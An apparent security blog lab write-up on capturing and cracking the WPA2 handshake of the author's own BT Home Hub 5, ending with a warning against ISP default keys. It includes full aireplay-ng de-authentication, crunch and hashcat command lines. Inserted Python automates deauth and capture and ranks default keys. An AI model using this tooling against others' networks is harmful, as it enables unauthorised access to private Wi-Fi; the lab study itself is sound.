Innogen security

WPA/2 Handshake Cracking

Recently I was fortunate enough to purchase a PC with a reasonably good GPU specification that could be set up as a password cracking machine. The machine already had a clean, licensed Windows 10 Pro install, so it made sense to keep that running (the GPU benchmarks would be the same either way) and to run Kali inside a VM.

Once the Kali instance was installed as a VM, and tools such as crunch and hashcat were installed on the Windows host, it was time to set up a basic lab.

The specs are as follows:

CPU: Intel i7-4790K 4GHz
Memory: 32GB
GPU: Radeon R9 295X2 (two Hawaii GPUs, seen as Device #1 and #2 in the benchmark below)
HDD(s): 1 x SSD 256GB OS, 1 x SATA 2TB as a data drive.

Lab Setup

The first router out of my parts box was a BT Home Hub 5, so that was used as the test router for cracking. A further post will be added at a later date if I manage to obtain another ISP-supplied router.

BT Home Hub 5 Setup:

  • All settings reset to factory
  • SSID: BTHub-5SFC
  • WPA Password: b98eb2bd67

Kali Setup:

  • Kali installed and updated as a VM inside VMware Workstation
  • Alfa USB Wifi adapter AWUS051NH v2, passed through as a USB device into Kali so airodump-ng can use it
  • eth0 interface added with a static IP so the VM can be reached over SSH from my laptop

Win10 PC:

  • hashcat installed
  • crunch installed
  • PATH environment variable updated so both can be run from the command line
  • hashcat WPA/WPA2 benchmark = 377 kH/s (output below)

PS C:\Users\Pentest\Desktop\captures> hashcat.exe -b -m 2500
hashcat (v4.0.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

* Device #3: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
OpenCL Platform #1: Advanced Micro Devices, Inc.
================================================
* Device #1: Hawaii, 3264/4096 MB allocatable, 44MCU
* Device #2: Hawaii, 3264/4096 MB allocatable, 44MCU
* Device #3: Intel(R) Core(TM) i7-4790K CPU @ 4.00GHz, skipped.

Benchmark relevant options:
===========================
* --optimized-kernel-enable

Hashmode: 2500 - WPA/WPA2

Speed.Dev.#1.....:   188.8 kH/s (59.07ms)
Speed.Dev.#2.....:   188.2 kH/s (59.33ms)
Speed.Dev.#*.....:   377.0 kH/s

Started: Thu Dec 14 12:21:01 2017
Stopped: Thu Dec 14 12:21:11 2017

Attack Setup

Now that the basic lab is in place, it is time to connect a client to the access point and run a de-authentication attack, so that airodump-ng can capture the WPA2 four-way handshake when the client reconnects.

Wifi Client: an iPhone, associated to the BTHub-5SFC SSID.

Wifi Setup:

I used a script that I had written some time ago to put the wlan adapter into monitor mode and launch airodump-ng. The script is available on my GitHub:

https://github.com/sbridgens/kali_wifi_setup_script

AP Selection:

From the airodump-ng listing I picked out the BT hotspot (its BSSID and channel) and the iPhone associated to it (its station MAC).

Those values are all that is needed to populate the two commands for the capture: airodump-ng locked to the AP's channel and filtered to its BSSID, and aireplay-ng sending de-authentication frames to the client.

The -w switch on the airodump-ng command writes the captured packets to disk using "BTHub-5SFC" as the file name prefix (airodump-ng appends a sequence number and extension, giving BTHub-5SFC-01.cap).

WPA Handshake Capture

Now that everything is set up we can use the prepared commands and begin the de-authentication attack against the wifi AP.

Airodump-ng:

Launching the first of our commands shows the AP and its associated client.

aireplay-ng de-authentication attack:

The second of the prepared commands sends forged de-authentication frames to the connected client's MAC address, so that the client drops off and re-associates; airodump-ng then captures the four-way handshake between the client and the AP:

Once the de-authentication frames have been sent, we recheck the airodump-ng screen: when a handshake has been captured, its header line reads "WPA handshake:" followed by the AP's BSSID. In this case it did, so the attack was successful:

Checking the local file system shows the capture files; the .cap file is the one carried forward to hashcat:
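The command template itself is not reproduced above, so here is one as an added example (my own code, not the author's kali_wifi_setup_script or the commands from the post). It fills in the airodump-ng and aireplay-ng invocations from a BSSID, channel, client MAC and file prefix, runs them in sequence, and then asks aircrack-ng whether the resulting .cap holds a handshake. The interface name, channel and MAC addresses are placeholders, and the aircrack-ng listing at the bottom is constructed for offline use.

```python
"""Added example: fill in and run the handshake-capture command template.
Not code from the original post; all MACs, the channel and wlan0mon are assumed."""
import re
import signal
import subprocess
import time

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


def check_mac(mac):
    """Refuse anything that is not a colon-separated MAC before it is passed to a tool."""
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return mac.upper()


def airodump_argv(iface, bssid, channel, prefix):
    """Lock airodump-ng to the AP's channel and BSSID; -w <prefix> writes <prefix>-01.cap."""
    return ["airodump-ng", "--bssid", check_mac(bssid), "-c", str(int(channel)),
            "-w", prefix, iface]


def aireplay_argv(iface, bssid, client, bursts=5):
    """-0 N sends N de-auth bursts to the client (-c) on behalf of the AP (-a)."""
    return ["aireplay-ng", "-0", str(int(bursts)), "-a", check_mac(bssid),
            "-c", check_mac(client), iface]


def capture_path(prefix, index=1):
    """airodump-ng names its pcap <prefix>-NN.cap, NN starting at 01."""
    return f"{prefix}-{index:02d}.cap"


def handshake_listed(aircrack_listing, bssid):
    """Running aircrack-ng <file> with no wordlist prints one row per network, ending in
    '(N handshake)'; we want N > 0 on the row for our BSSID."""
    bssid = check_mac(bssid)
    for line in aircrack_listing.splitlines():
        if bssid in line.upper():
            m = re.search(r"\((\d+) handshake", line)
            return bool(m) and int(m.group(1)) > 0
    return False


def run_capture(iface, bssid, channel, client, prefix, deauth_wait=15):
    """Run the whole sequence on a live interface; True when aircrack-ng reports a handshake."""
    dump = subprocess.Popen(airodump_argv(iface, bssid, channel, prefix),
                            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    try:
        time.sleep(5)                                   # let airodump-ng see the client
        subprocess.run(aireplay_argv(iface, bssid, client), check=False)
        time.sleep(deauth_wait)                         # give the client time to re-associate
    finally:
        dump.send_signal(signal.SIGINT)                 # same as Ctrl-C, so files are flushed
        dump.wait()
    listing = subprocess.run(["aircrack-ng", capture_path(prefix)],
                             capture_output=True, text=True, check=False).stdout
    return handshake_listed(listing, bssid)


# Constructed sample of an aircrack-ng network listing, used to exercise the check offline.
SAMPLE_LISTING = """\
Opening BTHub-5SFC-01.cap
Read 1842 packets.

   #  BSSID              ESSID                     Encryption

   1  00:11:22:33:44:55  BTHub-5SFC                WPA (1 handshake)
   2  66:77:88:99:AA:BB  Neighbour                 WPA (0 handshake)
"""

if __name__ == "__main__":
    print(" ".join(airodump_argv("wlan0mon", "00:11:22:33:44:55", 6, "BTHub-5SFC")))
    print(" ".join(aireplay_argv("wlan0mon", "00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff")))
    print("handshake in sample listing:", handshake_listed(SAMPLE_LISTING, "00:11:22:33:44:55"))
```

Only run_capture touches the radio; the argv builders and the listing check can be exercised without an adapter, which is also how to confirm the template before pointing it at a real AP.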

Convert the .cap to Hashcat hccapx Format

For hashcat to process the captured handshake, the .cap file must be converted to hashcat's hccapx format; more information about the format can be found at the following links:

https://hashcat.net/wiki/doku.php?id=hccapx

https://hashcat.net/forum/thread-6273.html

To convert the file I used the hashcat website:

https://hashcat.net/cap2hccapx/

(Bear in mind that uploading a capture to a third-party site hands over the handshake together with the SSID and both MAC addresses; the same conversion can be done offline with the cap2hccapx tool from hashcat-utils.)

Once the hccapx is downloaded, it is renamed and placed in the captures directory ready for processing by hashcat:
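Before spending GPU days on a file it is worth checking what the converter actually produced. The following reader, added here as an example and not code from the post or from hashcat, unpacks the 393-byte hccapx records described on the wiki page above and reports ESSID, both MACs, key version and which handshake messages were paired. The sample record is constructed inline with placeholder MACs, nonces, MIC and EAPOL bytes; only the ESSID comes from the lab.

```python
"""Added example: sanity-check an hccapx file before handing it to hashcat.
Record layout per the hccapx wiki page; the sample at the bottom is constructed."""
import struct
import sys
from typing import List, NamedTuple

# 393 bytes, little-endian, fixed-size fields: signature, version, message_pair,
# essid_len, essid[32], keyver, keymic[16], mac_ap[6], nonce_ap[32], mac_sta[6],
# nonce_sta[32], eapol_len, eapol[256]
HCCAPX = struct.Struct("<4sIBB32sB16s6s32s6s32sH256s")
SIGNATURE = b"HCPX"
VERSION = 4

MESSAGE_PAIRS = {
    0: "M1+M2, EAPOL from M2", 1: "M1+M4, EAPOL from M4",
    2: "M2+M3, EAPOL from M2", 3: "M2+M3, EAPOL from M3",
    4: "M3+M4, EAPOL from M3", 5: "M3+M4, EAPOL from M4",
}
KEY_VERSIONS = {1: "WPA (HMAC-MD5)", 2: "WPA2 (HMAC-SHA1)", 3: "WPA2 (AES-128-CMAC)"}


class Handshake(NamedTuple):
    essid: str
    bssid: str
    station: str
    message_pair: str
    replay_counter_mismatch: bool
    key_version: str
    mic: str
    eapol_len: int


def fmt_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_hccapx(data: bytes) -> List[Handshake]:
    """Decode every record; raise on a truncated file or a record that is not hccapx."""
    if len(data) == 0 or len(data) % HCCAPX.size:
        raise ValueError(f"length {len(data)} is not a multiple of {HCCAPX.size}")
    records = []
    for off in range(0, len(data), HCCAPX.size):
        (sig, version, msg_pair, essid_len, essid, keyver, mic, mac_ap, _nonce_ap,
         mac_sta, _nonce_sta, eapol_len, _eapol) = HCCAPX.unpack_from(data, off)
        if sig != SIGNATURE:
            raise ValueError(f"bad signature at offset {off}: {sig!r}")
        if version != VERSION:
            raise ValueError(f"unsupported hccapx version {version}")
        if essid_len > 32 or eapol_len > 256:
            raise ValueError(f"corrupt length fields at offset {off}")
        records.append(Handshake(
            essid=essid[:essid_len].decode("utf-8", "replace"),
            bssid=fmt_mac(mac_ap),
            station=fmt_mac(mac_sta),
            message_pair=MESSAGE_PAIRS.get(msg_pair & 0x07, f"unknown ({msg_pair & 0x07})"),
            replay_counter_mismatch=bool(msg_pair & 0x80),  # high bit: the two messages' replay counters differ
            key_version=KEY_VERSIONS.get(keyver, f"unknown ({keyver})"),
            mic=mic.hex(),
            eapol_len=eapol_len,
        ))
    return records


def build_record(essid: bytes, mac_ap: bytes, mac_sta: bytes, eapol: bytes, *,
                 message_pair=0, keyver=2, mic=b"\0" * 16,
                 nonce_ap=b"\0" * 32, nonce_sta=b"\0" * 32) -> bytes:
    """Pack one record; struct NUL-pads the fixed-size fields for us."""
    if len(essid) > 32 or len(eapol) > 256:
        raise ValueError("ESSID or EAPOL too long for hccapx")
    return HCCAPX.pack(SIGNATURE, VERSION, message_pair, len(essid), essid, keyver, mic,
                       mac_ap, nonce_ap, mac_sta, nonce_sta, len(eapol), eapol)


# Constructed sample: placeholder MACs, nonces and MIC, and a 99-byte dummy EAPOL body.
SAMPLE = build_record(
    b"BTHub-5SFC", bytes.fromhex("001122334455"), bytes.fromhex("aabbccddeeff"),
    bytes(range(99)), message_pair=2, keyver=2, mic=bytes(range(16)),
    nonce_ap=bytes(range(32)), nonce_sta=bytes(range(32, 64)))

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for i, hs in enumerate(parse_hccapx(data), 1):
        flag = " [replay counter mismatch]" if hs.replay_counter_mismatch else ""
        print(f"#{i} {hs.essid!r} ap={hs.bssid} sta={hs.station} {hs.key_version} "
              f"{hs.message_pair} eapol={hs.eapol_len}B mic={hs.mic}{flag}")
```

Run it as "python3 hccapx_check.py 5SFC.hccapx"; with no argument it decodes the constructed sample. A file with several records means the converter found several handshakes (or several partial pairs), and a flagged replay-counter mismatch is the kind of record hashcat may need --nonce-error-corrections to crack.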

Hashcat Mask VS Wordlist

Based on a large number of online discussions, the BT Home Hub 5 default key space is well known and follows these rules:

  • 10 characters in length
  • Lowercase letters a-f only
  • Digits 2-9 only (0 and 1 are never used)
  • No character is repeated consecutively (so "bb" or "22" never appears)

That gives a 14-character set, and the corresponding hashcat mask attack command line would be:

hashcat -m 2500 -w 3 .\5SFC.hccapx -o .\5SFC_Password.txt -a 3 \
-1 abcdef23456789 ?1?1?1?1?1?1?1?1?1?1

The problem is that the mask also tries every candidate containing a consecutive repeat, which the ruleset excludes. That is just under half of the 14^10 (about 289 billion) mask keyspace, so the attack takes correspondingly longer:

9 Days via mask attack:

Time.Started.....: Thu Jan 04 11:22:20 2018 (1 min, 32 secs)
Time.Estimated...: Sat Jan 13 11:54:47 2018 (9 days, 0 hours)
Guess.Mask.......: ?1?1?1?1?1?1?1?1?1?1 [10]

This is far too long and I was certain we could do better, so it was over to crunch to create a wordlist that honours the ruleset. Generating it would no doubt take a good deal of time, but the hope was that it would reduce the overall cracking time:

Crunch wordlist generation:

PS D:\> crunch 10 10 abcdef23456789 -d 1@ -o bthh5_wordlist.txt
Crunch will now generate the following amount of data: 
1633092903442 bytes
1557438 MB
1520 GB
1 TB
0 PB
Crunch will now generate the following number of lines: 148462991222

As shown, this generates a 1.5 TB wordlist, which took approximately 7 hours to write. (Crunch therefore produced its 148 billion lines at roughly 5.9 million lines per second, over ten times faster than the 377 kH/s at which hashcat can test them, so the output could equally have been piped straight into hashcat's stdin with "crunch ... | hashcat -m 2500 -a 0 ..." instead of being stored, at the cost of not being able to pause and resume the session.) After the wait the hope was for better things, and as we can see I was not disappointed:

4 days 19 hours for the wordlist attack:

That is a reduction of just over four days compared with the 9-day mask attack, which is much preferable.

WPA2 Password cracked

As the lab key sits toward the front of the keyspace (it starts with "b", the second character in the crunch charset), it took only 17 hours and 36 minutes to crack the default password. I also ran a friend's captured key, which sits further down the keyspace (it starts with "5"), and even that was cracked in 3 days and 13 hours.
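To see why the wordlist beats the mask, and why a key beginning with "b" falls so early, here is the keyspace arithmetic as an added example (my own code, not from the post). It assumes the charset order given to crunch above and the 377 kH/s benchmark, computes the line number of a key in the crunch output, and applies the same arithmetic to the larger Hub 6 style keyspace discussed in the conclusion.

```python
"""Added example: keyspace arithmetic for the Home Hub 5 ruleset.
Charset order is the one passed to crunch in the post; 377 kH/s is the post's benchmark."""
import string

CHARSET = "abcdef23456789"   # order matters: crunch (and so hashcat -a 0) walks it in this order
LENGTH = 10
RATE_HS = 377_000            # hashcat -m 2500 benchmark, two Hawaii GPUs


def mask_keyspace(charset=CHARSET, length=LENGTH):
    """What -a 3 -1 <charset> ?1?1?1?1?1?1?1?1?1?1 tries: every combination, repeats included."""
    return len(charset) ** length


def ruleset_keyspace(charset=CHARSET, length=LENGTH):
    """What crunch -d 1@ emits: any first character, then each later character
    differs from its predecessor (the 'no consecutive characters' rule)."""
    n = len(charset)
    return n * (n - 1) ** (length - 1)


def wordlist_bytes(charset=CHARSET, length=LENGTH):
    """crunch writes one candidate per line plus a newline."""
    return ruleset_keyspace(charset, length) * (length + 1)


def is_valid_key(key, charset=CHARSET, length=LENGTH):
    return (len(key) == length and all(c in charset for c in key)
            and all(a != b for a, b in zip(key, key[1:])))


def rank_in_wordlist(key, charset=CHARSET):
    """0-based line number of key in the crunch output, i.e. how many valid candidates
    hashcat tests before reaching it. For each position, count the valid completions
    that start with a smaller character there (a character equal to the previous one
    is not allowed, so it is never counted)."""
    if not is_valid_key(key, charset, len(key)):
        raise ValueError("key violates the ruleset")
    n = len(charset)
    index = {c: i for i, c in enumerate(charset)}
    rank, prev = 0, None
    for pos, ch in enumerate(key):
        remaining = len(key) - pos - 1
        smaller = sum(1 for c in charset[:index[ch]] if c != prev)
        rank += smaller * (n - 1) ** remaining
        prev = ch
    return rank


def hours(candidates, rate=RATE_HS):
    """Wall-clock hours to test that many candidates at full benchmark speed."""
    return candidates / rate / 3600


if __name__ == "__main__":
    print(f"mask keyspace      {mask_keyspace():>16,}  ~{hours(mask_keyspace()) / 24:.1f} days")
    print(f"ruleset keyspace   {ruleset_keyspace():>16,}  ~{hours(ruleset_keyspace()) / 24:.1f} days")
    print(f"wasted by the mask {1 - ruleset_keyspace() / mask_keyspace():.1%}")
    print(f"wordlist size      {wordlist_bytes() / 2**40:.2f} TiB")
    r = rank_in_wordlist("b98eb2bd67")
    print(f"b98eb2bd67: line {r:,} of the wordlist, reached after ~{hours(r):.1f} h")
    # Same arithmetic for a 12-character a-z, A-Z, 1-9 key as described for the Hub 6
    hub6 = mask_keyspace(string.ascii_letters + "123456789", 12)
    print(f"12 x [a-zA-Z1-9]: {hub6:.2e} candidates, ~{hours(hub6) / 24 / 365:.0f} years")
```

The arithmetic reproduces crunch's own figures exactly (148,462,991,222 lines, 1,633,092,903,442 bytes) and gives about 8.9 days for the mask, 4.6 days for the whole wordlist and roughly 15.6 hours to reach the lab key; the 4 days 19 hours and 17 h 36 min observed in the post are consistent with that once the overhead of streaming a 1.5 TB file through hashcat is allowed for.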

Hashcat cracked:

Note: because the run was given -o, the cracked key is not echoed to the console; it is written to the output file named by that switch (-o .\5SFC_Password.txt) and to the potfile (unless that is disabled with --potfile-disable). Re-running the same command with --show prints it again from the potfile.

More info regarding the potfile and hashcat output can be seen here:

https://hashcat.net/wiki/doku.php?id=frequently_asked_questions

Password File Content:

The output file written by the -o switch holds the cracked entry in the same hash:password form that hashcat stores in its potfile.

Conclusion

Although this is a lengthy write-up, it shows that sticking with the ISP default password is really not a good idea: with the power of modern GPUs it does not take a large amount of effort to crack a 10-character password drawn from such a small character set. Capturing the handshake took mere minutes, and dropping the capture file onto the GPU box and walking away, checking once a day, was no real effort at all.

With a second set of GPU cards the time would roughly halve, and a larger budget and more powerful GPUs would reduce it significantly further. With the password in hand, the next step for a criminal enterprise could be to enumerate your network, capture traffic and potentially install key loggers or other malicious software.

It is worth stating that BT have stepped up the game with the BTHub-6 by raising the length to 12 characters, allowing consecutive repeats, and drawing from upper- and lowercase letters plus the digits 1-9. That is 61 possible characters in each of 12 positions, about 2.65 × 10^21 candidates, and a quick hashcat benchmark for that mask shows the following:

Time.Estimated...: Next Big Bang (> 10 years)

As we can see, nobody would attempt a crack of this with current technology; an attacker would simply move on to weaker targets or find another route in.

Hope this experiment in testing default passwords proves useful.
